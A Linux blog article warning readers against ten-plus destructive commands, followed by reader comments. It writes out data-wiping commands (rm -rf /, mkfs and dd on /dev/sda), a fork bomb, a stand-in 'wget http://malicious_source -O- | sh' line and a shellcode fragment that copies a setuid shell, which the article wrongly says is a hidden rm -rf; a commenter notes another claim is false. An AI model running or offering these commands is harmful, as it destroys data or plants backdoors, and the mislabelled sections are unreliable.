10 Most Dangerous Commands – You Should Never Execute on Linux

The command-line interface is a powerful and handy utility for administering a Linux system. It provides a fast and versatile way of running the system, especially when managing headless systems which do not have a graphical interface.

While useful in managing your system, the command line is fraught with risks. Running bad commands can cause harm and irrecoverable damage to your system. In this guide, we have compiled a list of some of the riskiest commands that you should not think of executing on your system.

1. rm -rf / Command

The rm command is a Linux command used to delete files and directories depending on the arguments used. However, extreme caution should be taken when using the rm command as a slight typo or mistake can result in unrecoverable system damage.

When executed as root with the -rf / option, the command recursively deletes all files and directories on your system starting from the root (/) which is the highest in the Linux File Hierarchy structure. In a nutshell, the rm -rf / command completely wipes out your system resulting in a broken and unrecoverable system.

The some of options used with the rm command are.

  • rm command in Linux is used to delete files.
  • rm -r command deletes the folder recursively, even the empty folder.
  • rm -f command removes ‘Read only File’ without asking.
  • rm -rf / : Force deletion of everything in the root directory.
  • rm -rf * : Force deletion of everything in the current directory/working directory.
  • rm -rf . : Force deletion of current folder and subfolders.

In fact, when you run the command as a regular user, you will get two warnings on the terminal.

Linux rm Command Example
Linux rm Command Example

To overcome accidental deletion of files by the ‘rm‘ command, create an alias of the ‘rm’ command as ‘rm -i’ in the “.bashrc” file, it will ask you to confirm every deletion.

2. :(){:|:&};: Command

The above is actually a fork bomb. It operates by creating a function called ':', which calls itself twice, once in the foreground and once in the background. The function executes repeatedly and in doing so, consumes all the system resources resulting in a system crash.

In fact, a fork bomb command is essentially a form of DoS (Denial-of-Service) attack. It is also referred to as the Wabbit or Rabbit virus. The worst part is that you don’t need to be root to launch this attack.

Thankfully, you can shield yourself from this attack by limiting the number of processes run by local users to around 4000.

You can do this by running the command:

$ ulimit -S -u 4000

You can later verify this using the command:

$ ulimit -u
Increase Open Files Limit in Linux
Increase Open Files Limit in Linux

3. command > /dev/sda

Running a command followed by >/dev/sda overwrites the /dev/sda block on your hard drive. This block contains filesystem data and when overwritten, results in a damaged system that is irrecoverable.

4. mv folder /dev/null

Another harmful operation that you should not try is moving a directory or file to /dev/null. The /dev/null file is a special type of file known as the null device or “the black hole“. Anything that is moved to /dev/null is discarded and destroyed.

The following command moves all the contents of the user’s home directory to /dev/null, consequently discarding all the data contained in the user’s home directory

# mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

The wget command is a command that downloads files from a web or file server. The above command downloads a script from a malicious source and then executes it.

6. mkfs.ext3 /dev/sda

The mkfs command creates a new filesystem (either ext2, ext3, ext4, etc) on a formatted storage device, in most cases a partition of a hard disk drive. Running the mkfs command on a partition wipes all the data stored in it.

While useful in formatting disk partitions, formatting an entire drive (such as mkfs.ext3 /dev/sda) crashes the system and leaves it in an irrecoverable state. This happens because it destroys all the system files alongside your personal data.

The command can also take other forms as shown below.

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. > file Command

The > file wipes out a file’s content and leaves it blank. It is synonymous with the cat /dev/null > file command. Caution should therefore be taken when using the redirection operators in a Linux system.

Below is a demonstration of how this command overwrites a text file. You can imagine the disaster that this command would cause when the file involved is a configuration file.

Redirection Operator Command Example
Redirection Operator Command Example

8. ^foo^bar

The ^foo^bar command is as dangerous as it is useful depending on how it is executed. While it allows you to edit previously executed commands and execute them again, it can be disastrous if you are not keen on the changes made to the commands before running them.

9. dd if=/dev/random of=/dev/sda

The above command wipes out the /dev/sda block and writes random junk data to the block. Your system would be left at an inconsistent and unrecoverable stage.

10. Chmod -R 777 /

While it may not immediately crash your Linux system, the chmod -R 777 / command recursively assigns all permissions (read, write and execute) to all files on your Linux system starting from the root.

This effectively exposes all critical configuration files and other files to all users and this poses a huge security risk to your system. Anyone with nefarious intentions can tinker with crucial files and easily break your system.

11. The Hidden Command

The below command is nothing but the first command above (rm -rf). Here the codes are hidden in hex so that an ignorant user may be fooled. Running the below code in your terminal will wipe your root partition.

This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“cp -p /bin/sh /tmp/.beyond; chmod 4755

Note: Don’t execute any of the above commands in your Linux terminal or shell or on your friend or school computer. If you want to test them, run them on a virtual machine.

Any inconsistency or data loss, due to the execution of the above command will break your system down for which, neither the Author of the article nor Tecmint is responsible.

That’s all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to Tecmint.

If you know any other such Dangerous Linux Commands and you would like us to add them to the list, please tell us via the comment section, and don’t forget to give your valuable feedback.

If you read this far, tweet to the author to show them you care. Tweet a thanks
James Kiarie
This is James, a certified Linux administrator and a tech enthusiast who loves keeping in touch with emerging trends in the tech world. When I'm not running commands on the terminal, I'm taking listening to some cool music. taking a casual stroll or watching a nice movie.

Each tutorial at TecMint is created by a team of experienced Linux system administrators so that it meets our high-quality standards.

Join the TecMint Weekly Newsletter (More Than 156,129 Linux Enthusiasts Have Subscribed)
Was this article helpful? Please add a comment or buy me a coffee to show your appreciation.

42 thoughts on “10 Most Dangerous Commands – You Should Never Execute on Linux”

  1. Hi, I once had to remove some temporary files beginning with a tilde in my home directory, unfortunately, I was distracted and typed an extra space after the tilde: rm ~ *, you can imagine what happened.

    Anyway, such errors are good to do once, because that’s the kind of thing you never ever forget;-p)

  2. Today I wrote a command using a single * nothing more and the result was that the entire current directory was deleted!

    Fortunately, I add all backed up on Git bitbucket.

  3. Hmm… Thanks for the article. But KJ is right: “I doubt this is going to work, you will get an error message like: mv: target ‘/dev/null’ is not a directory or mv: cannot overwrite non-directory ‘/dev/null’ with directory ‘folder’”

    It is impossible to move folders to /dev/null. One would expect the author of a guide like this to actually have tried the commands before writing an “expert” article about it… But is that just me being overly critical??? However, files can be moved there. But these files will overwrite /dev/null-content.


Got something to say? Join the discussion.

Have a question or suggestion? Please leave a comment to start the discussion. Please keep in mind that all comments are moderated and your email address will NOT be published.